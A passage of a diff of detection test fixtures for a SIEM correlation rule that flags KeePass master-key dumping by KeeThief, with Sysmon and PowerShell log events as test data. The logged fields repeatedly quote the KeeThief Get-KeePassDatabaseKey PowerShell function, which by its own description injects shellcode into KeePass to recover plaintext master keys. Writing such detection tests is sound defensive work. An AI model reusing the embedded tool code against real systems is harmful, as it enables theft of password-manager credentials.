EncryptedBlobAddress : 49037240 EncryptedBlob : {137, 185, 6, 97...} EncryptedBlobLen : 32 PlaintextBlob : {177, 5, 150, 205...} Plaintext : sQWWzdcT... KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\Documents\\s.license Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpPassword KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 48920376 EncryptedBlob : {228, 78, 75, 16...} EncryptedBlobLen : 16 PlaintextBlob : {80, 97, 115, 115...} Plaintext : Password123! 
KeyFilePath : .EXAMPLE PS C:\\> Get-Process KeePass | Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount ....# > [CmdletBinding()] param ( [Parameter(Position = 0, ValueFromPipeline = $True)] [System.Diagnostics.Process[]] [ValidateNotNullOrEmpty()] $Process ) BEGIN { if(-not $PSBoundParameters['Process']) { try { $Process = Get-Process KeePass -ErrorAction Stop | Where-Object {$_.FileVersion -match '^2\\.'} } catch { throw 'No KeePass 2.X instances open!' } } # load file off of disk instead # $Assembly = [Reflection.Assembly]::LoadFile((Get-Item -Path .\\ReleaseKeePass.exe).FullName) # the KeyTheft assembly, generated with \"Out-CompressedDll -FilePath .\\ReleaseKeePass.exe | Out-File -Encoding ASCII .\\compressed.ps1\" } PROCESS { ForEach($KeePassProcess in $Process) { if($KeePassProcess.FileVersion -match '^2\\.') { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $ExecutablePath = $WMIProcess | Select-Object -Expand ExecutablePath Write-Verbose \"Examining KeePass process $($KeePassProcess.ID) for master keys\" $Keys = $Assembly.GetType('KeeTheft.Program').GetMethod('GetKeePassMasterKeys').Invoke($null, @([System.Diagnostics.Process]$KeePassProcess)) if($Keys) { ForEach ($Key in $Keys) { ForEach($UserKey in $Key.UserKeys) { $KeyType = $UserKey.GetType().Name $UserKeyObject = New-Object PSObject $UserKeyObject | Add-Member Noteproperty 'Database' $UserKey.databaseLocation $UserKeyObject | Add-Member Noteproperty 'KeyType' $KeyType $UserKeyObject | Add-Member Noteproperty 'KeePassVersion' $KeePassProcess.FileVersion $UserKeyObject | Add-Member Noteproperty 'ProcessID' $KeePassProcess.ID $UserKeyObject | Add-Member Noteproperty 'ExecutablePath' $ExecutablePath $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobAddress' $UserKey.encryptedBlobAddress $UserKeyObject | Add-Member Noteproperty 
'EncryptedBlob' $UserKey.encryptedBlob $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobLen' $UserKey.encryptedBlobLen $UserKeyObject | Add-Member Noteproperty 'PlaintextBlob' $UserKey.plaintextBlob if($KeyType -eq 'KcpPassword') { $Plaintext = [System.Text.Encoding]::UTF8.GetString($UserKey.plaintextBlob) } else { $Plaintext = [Convert]::ToBase64String($UserKey.plaintextBlob) } $UserKeyObject | Add-Member Noteproperty 'Plaintext' $Plaintext if($KeyType -eq 'KcpUserAccount') { try { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $UserName = $WMIProcess.GetOwner().User $ProtectedUserKeyPath = Resolve-Path -Path \"$($Env:WinDir | Split-Path -Qualifier)\\Users\\*$UserName*\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin\" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $ProtectedUserKeyPath } catch { Write-Warning \"Error enumerating the owner of $($KeePassProcess.ID) : $_\" } } else { $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $UserKey.keyFilePath } $UserKeyObject.PSObject.TypeNames.Insert(0, 'KeePass.Keys') $UserKeyObject } } } else { Write-Verbose \"No keys found for $($KeePassProcess.ID)\" } } else { Write-Warning \"Only KeePass 2.X is supported at this time.\" } } }}", "object.process.id": "7064", "object.value": "# requires -version 2function Get-KeePassDatabaseKey {<# .SYNOPSIS Retrieves database mastey key information for unlocked KeePass database. Function: Get-KeePassDatabaseKey Author: Lee Christensen (@tifkin_), Will Schroeder (@harmj0y) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION Enumerates any KeePass 2.X (.NET) processes currently open, or takes a process object on the pipeline. Loades the C# KeeTheft assembly into memory and for each open KeePass process executes the GetKeePassMasterKeys() method on it. 
GetKeePassMasterKeys() will attach to the target KeePass process using CLR MD and enumerate all CLR heap objects, searching for a KeePassLib.PwDatabase object. If one is found, the path is extracted from the m_strUrl field, and all referenced objects are enumerated, searching for a KeePassLib.Keys.CompositeKey. If a composite master key is found, information for each key type (KcpPassword, KcpKeyFile, KcpUserAccount) is extracted, including the DPAPI encrypted data blobs of key data. For any encrypted blobs found, shellcode is injected into the KeePass process that calls MyRtlDecryptMemory() to decrypt the DPAPI memory blobs, returning the plaintext/unprotected key data. .PARAMETER Process Optional KeePass process object to pass in on the pipeline. .EXAMPLE PS C:\\> Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 49045328 EncryptedBlob : {113, 148, 127, 29...} EncryptedBlobLen : 64 PlaintextBlob : {120, 181, 162, 116...} Plaintext : eLWidCSt... KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpKeyFile KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 49037240 EncryptedBlob : {137, 185, 6, 97...} EncryptedBlobLen : 32 PlaintextBlob : {177, 5, 150, 205...} Plaintext : sQWWzdcT... 
KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\Documents\\s.license Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpPassword KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 48920376 EncryptedBlob : {228, 78, 75, 16...} EncryptedBlobLen : 16 PlaintextBlob : {80, 97, 115, 115...} Plaintext : Password123! KeyFilePath : .EXAMPLE PS C:\\> Get-Process KeePass | Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount ....# > [CmdletBinding()] param ( [Parameter(Position = 0, ValueFromPipeline = $True)] [System.Diagnostics.Process[]] [ValidateNotNullOrEmpty()] $Process ) BEGIN { if(-not $PSBoundParameters['Process']) { try { $Process = Get-Process KeePass -ErrorAction Stop | Where-Object {$_.FileVersion -match '^2\\.'} } catch { throw 'No KeePass 2.X instances open!' 
} } # load file off of disk instead # $Assembly = [Reflection.Assembly]::LoadFile((Get-Item -Path .\\ReleaseKeePass.exe).FullName) # the KeyTheft assembly, generated with \"Out-CompressedDll -FilePath .\\ReleaseKeePass.exe | Out-File -Encoding ASCII .\\compressed.ps1\" } PROCESS { ForEach($KeePassProcess in $Process) { if($KeePassProcess.FileVersion -match '^2\\.') { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $ExecutablePath = $WMIProcess | Select-Object -Expand ExecutablePath Write-Verbose \"Examining KeePass process $($KeePassProcess.ID) for master keys\" $Keys = $Assembly.GetType('KeeTheft.Program').GetMethod('GetKeePassMasterKeys').Invoke($null, @([System.Diagnostics.Process]$KeePassProcess)) if($Keys) { ForEach ($Key in $Keys) { ForEach($UserKey in $Key.UserKeys) { $KeyType = $UserKey.GetType().Name $UserKeyObject = New-Object PSObject $UserKeyObject | Add-Member Noteproperty 'Database' $UserKey.databaseLocation $UserKeyObject | Add-Member Noteproperty 'KeyType' $KeyType $UserKeyObject | Add-Member Noteproperty 'KeePassVersion' $KeePassProcess.FileVersion $UserKeyObject | Add-Member Noteproperty 'ProcessID' $KeePassProcess.ID $UserKeyObject | Add-Member Noteproperty 'ExecutablePath' $ExecutablePath $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobAddress' $UserKey.encryptedBlobAddress $UserKeyObject | Add-Member Noteproperty 'EncryptedBlob' $UserKey.encryptedBlob $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobLen' $UserKey.encryptedBlobLen $UserKeyObject | Add-Member Noteproperty 'PlaintextBlob' $UserKey.plaintextBlob if($KeyType -eq 'KcpPassword') { $Plaintext = [System.Text.Encoding]::UTF8.GetString($UserKey.plaintextBlob) } else { $Plaintext = [Convert]::ToBase64String($UserKey.plaintextBlob) } $UserKeyObject | Add-Member Noteproperty 'Plaintext' $Plaintext if($KeyType -eq 'KcpUserAccount') { try { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $UserName = 
$WMIProcess.GetOwner().User $ProtectedUserKeyPath = Resolve-Path -Path \"$($Env:WinDir | Split-Path -Qualifier)\\Users\\*$UserName*\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin\" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $ProtectedUserKeyPath } catch { Write-Warning \"Error enumerating the owner of $($KeePassProcess.ID) : $_\" } } else { $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $UserKey.keyFilePath } $UserKeyObject.PSObject.TypeNames.Insert(0, 'KeePass.Keys') $UserKeyObject } } } else { Write-Verbose \"No keys found for $($KeePassProcess.ID)\" } } else { Write-Warning \"Only KeePass 2.X is supported at this time.\" } } }}", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-06T11:33:47.757Z", "status": "success", "subject": "account", "subject.account.id": "S-1-5-18", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-27T18:55:02.710Z", "type": "raw", "uuid": "3e774e05-1f1a-4b58-812a-3127158afc3a"}
-expect 1 {"correlation_name": "Keepass_Key_Dump_Via_KeeThief"}
\ No newline at end of file
+# Тут будет твой тест. 
В секции expect укажи сколько и каких корреляционных событий ты ожидаешь
+expect 1 {"action": "extract", "alert.context": "getmethod('getkeepassmasterkeys').invoke", "category.generic": "Attack", "category.high": "Credential Access", "category.low": "Credentials from Password Stores: Password Managers", "correlation_name": "Keepass_Key_Dump_Via_KeeThief", "correlation_type": "incident", "datafield6": "0x06160000", "event_src.category": "Other", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "importance": "medium", "incident.aggregation.key": "Keepass_Key_Dump_Via_KeeThief|iewin7|c:\\program files\\keepass password safe 2\\keepass.exe", "incident.aggregation.timeout": 7200, "incident.category": "Undefined", "incident.severity": "medium", "numfield1": 1, "numfield2": 1, "object": "application", "object.id": "1384", "object.process.fullpath": "c:\\program files\\keepass password safe 2\\keepass.exe", "object.process.guid": "365abb72-a201-5cc4-0000-00104f500800", "object.process.id": "2364", "object.process.name": "keepass.exe", "object.process.path": "c:\\program files\\keepass password safe 2\\", "status": "success", "subject.account.id": "S-1-5-18", "subject.id": "d4643a9b-6f64-4fbc-95e8-c2524689590f", "subject.process.cmdline": "# requires -version 2function Get-KeePassDatabaseKey {<# .SYNOPSIS Retrieves database mastey key information for unlocked KeePass database. Function: Get-KeePassDatabaseKey Author: Lee Christensen (@tifkin_), Will Schroeder (@harmj0y) License: BSD 3-Clause Required Dependencies: None Optional Dependencies: None .DESCRIPTION Enumerates any KeePass 2.X (.NET) processes currently open, or takes a process object on the pipeline. Loades the C# KeeTheft assembly into memory and for each open KeePass process executes the GetKeePassMasterKeys() method on it. 
GetKeePassMasterKeys() will attach to the target KeePass process using CLR MD and enumerate all CLR heap objects, searching for a KeePassLib.PwDatabase object. If one is found, the path is extracted from the m_strUrl field, and all referenced objects are enumerated, searching for a KeePassLib.Keys.CompositeKey. If a composite master key is found, information for each key type (KcpPassword, KcpKeyFile, KcpUserAccount) is extracted, including the DPAPI encrypted data blobs of key data. For any encrypted blobs found, shellcode is injected into the KeePass process that calls MyRtlDecryptMemory() to decrypt the DPAPI memory blobs, returning the plaintext/unprotected key data. .PARAMETER Process Optional KeePass process object to pass in on the pipeline. .EXAMPLE PS C:\\> Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 49045328 EncryptedBlob : {113, 148, 127, 29...} EncryptedBlobLen : 64 PlaintextBlob : {120, 181, 162, 116...} Plaintext : eLWidCSt... KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpKeyFile KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 49037240 EncryptedBlob : {137, 185, 6, 97...} EncryptedBlobLen : 32 PlaintextBlob : {177, 5, 150, 205...} Plaintext : sQWWzdcT... 
KeyFilePath : C:\\Users\\harmj0y.TESTLAB\\Documents\\s.license Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpPassword KeePassVersion : 2.34.0.0 ProcessID : 4184 ExecutablePath : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\KeePass-2.34\\KeePass.exe EncryptedBlobAddress : 48920376 EncryptedBlob : {228, 78, 75, 16...} EncryptedBlobLen : 16 PlaintextBlob : {80, 97, 115, 115...} Plaintext : Password123! KeyFilePath : .EXAMPLE PS C:\\> Get-Process KeePass | Get-KeePassDatabaseKey -Verbose VERBOSE: Examining KeePass process 4184 for master keys Database : C:\\Users\\harmj0y.TESTLAB\\Desktop\\keepass\\NewDatabase.kdbx KeyType : KcpUserAccount ....# > [CmdletBinding()] param ( [Parameter(Position = 0, ValueFromPipeline = $True)] [System.Diagnostics.Process[]] [ValidateNotNullOrEmpty()] $Process ) BEGIN { if(-not $PSBoundParameters['Process']) { try { $Process = Get-Process KeePass -ErrorAction Stop | Where-Object {$_.FileVersion -match '^2\\.'} } catch { throw 'No KeePass 2.X instances open!' 
} } # load file off of disk instead # $Assembly = [Reflection.Assembly]::LoadFile((Get-Item -Path .\\ReleaseKeePass.exe).FullName) # the KeyTheft assembly, generated with \"Out-CompressedDll -FilePath .\\ReleaseKeePass.exe | Out-File -Encoding ASCII .\\compressed.ps1\" } PROCESS { ForEach($KeePassProcess in $Process) { if($KeePassProcess.FileVersion -match '^2\\.') { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $ExecutablePath = $WMIProcess | Select-Object -Expand ExecutablePath Write-Verbose \"Examining KeePass process $($KeePassProcess.ID) for master keys\" $Keys = $Assembly.GetType('KeeTheft.Program').GetMethod('GetKeePassMasterKeys').Invoke($null, @([System.Diagnostics.Process]$KeePassProcess)) if($Keys) { ForEach ($Key in $Keys) { ForEach($UserKey in $Key.UserKeys) { $KeyType = $UserKey.GetType().Name $UserKeyObject = New-Object PSObject $UserKeyObject | Add-Member Noteproperty 'Database' $UserKey.databaseLocation $UserKeyObject | Add-Member Noteproperty 'KeyType' $KeyType $UserKeyObject | Add-Member Noteproperty 'KeePassVersion' $KeePassProcess.FileVersion $UserKeyObject | Add-Member Noteproperty 'ProcessID' $KeePassProcess.ID $UserKeyObject | Add-Member Noteproperty 'ExecutablePath' $ExecutablePath $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobAddress' $UserKey.encryptedBlobAddress $UserKeyObject | Add-Member Noteproperty 'EncryptedBlob' $UserKey.encryptedBlob $UserKeyObject | Add-Member Noteproperty 'EncryptedBlobLen' $UserKey.encryptedBlobLen $UserKeyObject | Add-Member Noteproperty 'PlaintextBlob' $UserKey.plaintextBlob if($KeyType -eq 'KcpPassword') { $Plaintext = [System.Text.Encoding]::UTF8.GetString($UserKey.plaintextBlob) } else { $Plaintext = [Convert]::ToBase64String($UserKey.plaintextBlob) } $UserKeyObject | Add-Member Noteproperty 'Plaintext' $Plaintext if($KeyType -eq 'KcpUserAccount') { try { $WMIProcess = Get-WmiObject win32_process -Filter \"ProcessID = $($KeePassProcess.ID)\" $UserName = 
$WMIProcess.GetOwner().User $ProtectedUserKeyPath = Resolve-Path -Path \"$($Env:WinDir | Split-Path -Qualifier)\\Users\\*$UserName*\\AppData\\Roaming\\KeePass\\ProtectedUserKey.bin\" -ErrorAction SilentlyContinue | Select-Object -ExpandProperty Path $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $ProtectedUserKeyPath } catch { Write-Warning \"Error enumerating the owner of $($KeePassProcess.ID) : $_\" } } else { $UserKeyObject | Add-Member Noteproperty 'KeyFilePath' $UserKey.keyFilePath } $UserKeyObject.PSObject.TypeNames.Insert(0, 'KeePass.Keys') $UserKeyObject } } } else { Write-Verbose \"No keys found for $($KeePassProcess.ID)\" } } else { Write-Warning \"Only KeePass 2.X is supported at this time.\" } } }}", "subject.process.fullpath": "C:\\Users\\Administrator\\Downloads\\KeeThief_test\\KeeThief-master\\KeeTheft\\KeeTheft\\KeeThief.ps1", "subject.process.id": "7064", "subject.process.name": "KeeThief.ps1", "subject.process.path": "C:\\Users\\Administrator\\Downloads\\KeeThief_test\\KeeThief-master\\KeeTheft\\KeeTheft\\"}
\ No newline at end of file
diff --git a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Keepass_Key_Dump_Via_KeeThief/tests/test_3.sc b/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Keepass_Key_Dump_Via_KeeThief/tests/test_3.sc
deleted file mode 100644
index 4cf998cb..00000000
--- a/packages/windows_open_package/correlation_rules/mitre_attck_cred_access/Keepass_Key_Dump_Via_KeeThief/tests/test_3.sc
+++ /dev/null
@@ -1,7 +0,0 @@
-{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"8\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"8\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-27T18:55:04.9801378Z\"},\"EventRecordID\":\"7071\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1816\",\"ThreadID\":\"1228\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-04-27 18:55:04.980\"},{\"Name\":\"SourceProcessGuid\",\"text\":\"{365abb72-a512-5cc4-0000-0010c05e1b00}\"},{\"Name\":\"SourceProcessId\",\"text\":\"2856\"},{\"Name\":\"SourceImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\"},{\"Name\":\"TargetProcessGuid\",\"text\":\"{365abb72-a201-5cc4-0000-00104f500800}\"},{\"Name\":\"TargetProcessId\",\"text\":\"2364\"},{\"Name\":\"TargetImage\",\"text\":\"C:\\\\Program Files\\\\KeePass Password Safe 2\\\\KeePass.exe\"},{\"Name\":\"NewThreadId\",\"text\":\"1384\"},{\"Name\":\"StartAddress\",\"text\":\"0x06160000\"},{\"Name\":\"StartModule\"},{\"Name\":\"StartFunction\"}]}}}", "category.generic": "Thread", "category.high": "Availability Management", "category.low": "Control", "datafield6": "0x06160000", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_8_Create_remote_thread", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": 
"application/x-pt-eventlog", "msgid": "8", "normalized": true, "object": "thread", "object.id": "1384", "object.process.fullpath": "c:\\program files\\keepass password safe 2\\keepass.exe", "object.process.guid": "365abb72-a201-5cc4-0000-00104f500800", "object.process.id": "2364", "object.process.name": "keepass.exe", "object.process.path": "c:\\program files\\keepass password safe 2\\", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-06T03:10:10.818Z", "status": "success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "subject.process.guid": "365abb72-a512-5cc4-0000-0010c05e1b00", "subject.process.id": "2856", "subject.process.name": "powershell.exe", "subject.process.path": "c:\\windows\\system32\\windowspowershell\\v1.0\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-27T18:55:04.980Z", "type": "raw", "uuid": "d26cbfcd-61bb-4a46-83a3-3a1379d98dbc"}
-{"action": "start", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-Sysmon\",\"Guid\":\"{5770385f-c22a-43e0-bf4c-06f5698ffbd9}\"},\"EventID\":\"8\",\"Version\":\"2\",\"Level\":\"4\",\"Task\":\"8\",\"Opcode\":\"0\",\"Keywords\":\"0x8000000000000000\",\"TimeCreated\":{\"SystemTime\":\"2019-04-27T18:55:04.7106082Z\"},\"EventRecordID\":\"7070\",\"Correlation\":\"\",\"Execution\":{\"ProcessID\":\"1816\",\"ThreadID\":\"1228\"},\"Channel\":\"Microsoft-Windows-Sysmon/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"Name\":\"RuleName\"},{\"Name\":\"UtcTime\",\"text\":\"2019-04-27 
18:55:04.710\"},{\"Name\":\"SourceProcessGuid\",\"text\":\"{365abb72-a512-5cc4-0000-0010c05e1b00}\"},{\"Name\":\"SourceProcessId\",\"text\":\"2856\"},{\"Name\":\"SourceImage\",\"text\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\\\\powershell.exe\"},{\"Name\":\"TargetProcessGuid\",\"text\":\"{365abb72-a201-5cc4-0000-00104f500800}\"},{\"Name\":\"TargetProcessId\",\"text\":\"2364\"},{\"Name\":\"TargetImage\",\"text\":\"C:\\\\Program Files\\\\KeePass Password Safe 2\\\\KeePass.exe\"},{\"Name\":\"NewThreadId\",\"text\":\"3796\"},{\"Name\":\"StartAddress\",\"text\":\"0x76FAEC4B\"},{\"Name\":\"StartModule\",\"text\":\"C:\\\\Windows\\\\SYSTEM32\\\\ntdll.dll\"},{\"Name\":\"StartFunction\",\"text\":\"DbgUiRemoteBreakin\"}]}}}", "category.generic": "Thread", "category.high": "Availability Management", "category.low": "Control", "datafield6": "0x76FAEC4B", "event_src.category": "Other", "event_src.fqdn": "iewin7", "event_src.host": "iewin7", "event_src.hostname": "iewin7", "event_src.subsys": "Microsoft-Windows-Sysmon/Operational", "event_src.title": "sysmon", "event_src.vendor": "microsoft", "generator.type": "logcollector", "generator.version": "N26.0.2936", "id": "PT_Microsoft_Windows_eventlog_Sysmon_8_Create_remote_thread", "importance": "low", "input_id": "00000000-0000-0000-0000-000000000000", "mime": "application/x-pt-eventlog", "msgid": "8", "normalized": true, "object": "thread", "object.fullpath": "c:\\windows\\system32\\ntdll.dll", "object.id": "3796", "object.name": "ntdll.dll", "object.path": "c:\\windows\\system32\\", "object.process.fullpath": "c:\\program files\\keepass password safe 2\\keepass.exe", "object.process.guid": "365abb72-a201-5cc4-0000-00104f500800", "object.process.id": "2364", "object.process.name": "keepass.exe", "object.process.path": "c:\\program files\\keepass password safe 2\\", "object.property": "start function", "object.value": "DbgUiRemoteBreakin", "recv_ipv4": "127.0.0.1", "recv_time": "2023-06-06T03:10:10.818Z", "status": 
"success", "subject": "process", "subject.process.fullpath": "c:\\windows\\system32\\windowspowershell\\v1.0\\powershell.exe", "subject.process.guid": "365abb72-a512-5cc4-0000-0010c05e1b00", "subject.process.id": "2856", "subject.process.name": "powershell.exe", "subject.process.path": "c:\\windows\\system32\\windowspowershell\\v1.0\\", "tag": "some_tag", "task_id": "00000000-0000-0000-0000-000000000000", "taxonomy_version": "26.0.215-release-26.0", "time": "2019-04-27T18:55:04.710Z", "type": "raw", "uuid": "45f9b787-ef50-4e90-9a77-52c768689039"}
-{"action": "execute", "body": "{\"Event\":{\"xmlns\":\"http://schemas.microsoft.com/win/2004/08/events/event\",\"System\":{\"Provider\":{\"Name\":\"Microsoft-Windows-PowerShell\",\"Guid\":\"{a0c1853b-5c40-4b15-8766-3cf1c58f985a}\"},\"EventID\":\"4104\",\"Version\":\"1\",\"Level\":\"3\",\"Task\":\"2\",\"Opcode\":\"15\",\"Keywords\":\"0x0\",\"TimeCreated\":{\"SystemTime\":\"2019-04-27T18:55:02.7106082Z\"},\"EventRecordID\":\"273644\",\"Correlation\":{\"ActivityID\":\"{83cf053f-9302-0000-d6c4-7b840293d901}\"},\"Execution\":{\"ProcessID\":\"7064\",\"ThreadID\":\"5708\"},\"Channel\":\"Microsoft-Windows-PowerShell/Operational\",\"Computer\":\"IEWIN7\",\"Security\":{\"UserID\":\"S-1-5-18\"}},\"EventData\":{\"Data\":[{\"text\":\"1\",\"Name\":\"MessageNumber\"},{\"text\":\"1\",\"Name\":\"MessageTotal\"},{\"text\":\"# requires -version 2\\n\\nfunction Get-KeePassDatabaseKey {\\n<# \\n .SYNOPSIS\\n \\n Retrieves database mastey key information for unlocked KeePass database.\\n\\n Function: Get-KeePassDatabaseKey\\n Author: Lee Christensen (@tifkin_), Will Schroeder (@harmj0y)\\n License: BSD 3-Clause\\n Required Dependencies: None\\n Optional Dependencies: None\\n\\n .DESCRIPTION\\n \\n Enumerates any KeePass 2.X (.NET) processes currently open, or takes a process object on the pipeline.\\n Loades the C# KeeTheft assembly into memory and for each open KeePass process executes the GetKeePassMasterKeys()\\n method on it. 
GetKeePassMasterKeys() will attach to the target KeePass process using CLR MD and enumerate\\n all CLR heap objects, searching for a KeePassLib.PwDatabase object. If one is found, the path is extracted\\n from the m_strUrl field, and all referenced objects are enumerated, searching for a KeePassLib.Keys.CompositeKey.\\n If a composite master key is found, information for each key type (KcpPassword, KcpKeyFile, KcpUserAccount)\\n is extracted, including the DPAPI encrypted data blobs of key data. For any encrypted blobs found, shellcode\\n is injected into the KeePass process that calls MyRtlDecryptMemory() to decrypt the DPAPI memory blobs,\\n returning the plaintext/unprotected key data.\\n\\n .PARAMETER Process\\n\\n Optional KeePass process object to pass in on the pipeline.\\n\\n .EXAMPLE\\n\\n PS C:\\\\> Get-KeePassDatabaseKey -Verbose\\n VERBOSE: Examining KeePass process 4184 for master keys\\n\\n\\n Database : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\NewDatabase.kdbx\\n KeyType : KcpUserAccount\\n KeePassVersion : 2.34.0.0\\n ProcessID : 4184\\n ExecutablePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\KeePass-2.34\\\\KeePass.exe\\n EncryptedBlobAddress : 49045328\\n EncryptedBlob : {113, 148, 127, 29...}\\n EncryptedBlobLen : 64\\n PlaintextBlob : {120, 181, 162, 116...}\\n Plaintext : eLWidCSt...\\n KeyFilePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\AppData\\\\Roaming\\\\KeePass\\\\ProtectedUserKey.bin\\n\\n Database : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\NewDatabase.kdbx\\n KeyType : KcpKeyFile\\n KeePassVersion : 2.34.0.0\\n ProcessID : 4184\\n ExecutablePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Desktop\\\\keepass\\\\KeePass-2.34\\\\KeePass.exe\\n EncryptedBlobAddress : 49037240\\n EncryptedBlob : {137, 185, 6, 97...}\\n EncryptedBlobLen : 32\\n PlaintextBlob : {177, 5, 150, 205...}\\n Plaintext : sQWWzdcT...\\n KeyFilePath : C:\\\\Users\\\\harmj0y.TESTLAB\\\\Documents\\\\s.license\\n\\n Database : 
